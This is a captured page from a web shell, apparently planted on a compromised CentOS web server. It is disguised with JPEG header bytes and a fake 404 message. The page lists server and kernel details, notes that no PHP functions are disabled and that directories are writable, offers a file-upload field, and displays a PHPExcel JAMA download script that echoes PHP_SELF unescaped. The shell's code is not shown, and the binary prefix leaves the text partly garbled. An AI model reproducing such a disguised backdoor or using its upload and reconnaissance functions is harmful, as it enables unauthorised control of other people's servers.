����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkewebvumi.com/lib/office/PHPExcel/Shared/JAMA/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/thietkewebvumi.com/lib/office/PHPExcel/Shared/JAMA/docs/download.php
<?php
/**
* Script to create REGRESS package for download
*
* @author Mike Bommarito
* @author Paul Meagher
* @version 0.3
* @modified Apr 2, 2006
*
* Note: Script requires the PEAR Archive_Tar package be installed:
*
* @see http://pear.php.net/package/Archive_Tar
*/

// name and directory of package
$pkgName   = "JAMA";

// root of PHP/Math build directory
$buildDir  = substr(dirname(__FILE__), 0, -5 - strlen($pkgName));

// switch to PHP/Math build directory
chdir($buildDir);

$tarName = "$pkgName.tar.gz";  

$tarPath = $buildDir.$pkgName."/downloads/".$tarName;

if($_GET['op'] == "download") {  
  
	require_once('Archive/Tar.php');  
	
	$tar   = new Archive_Tar($tarPath);

  // create $pkgName archive under $pkgName folder
  $files = glob("$pkgName/*.php");
  $files = array_merge($files, glob("$pkgName/*.TXT"));
  $files = array_merge($files, glob("$pkgName/docs/*.php"));
  $files = array_merge($files, glob("$pkgName/docs/includes/*.php"));
  $files = array_merge($files, glob("$pkgName/examples/*.php"));
  $files = array_merge($files, glob("$pkgName/tests/*.php"));  
  $files = array_merge($files, glob("$pkgName/utils/*.php"));    
  
	$tar->create($files);
		
	// create the download url
  $webDir  = substr($_SERVER['PHP_SELF'], 0, -18);
  $urlPath = "http://".$_SERVER['HTTP_HOST'].$webDir."/downloads";
  
  // redirect to download url
	header("Location: $urlPath/$tarName");

}

include_once "includes/header.php";
include_once "includes/navbar.php";
?>
<p>
Download current version: 
</p>
<ul>
 <li><a href='<?php echo $_SERVER['PHP_SELF']."?op=download"; ?>'><?php echo $tarName ?></a></li>
</ul>
<?php
include_once "includes/footer.php";
?>

ZeroDay Forums Mini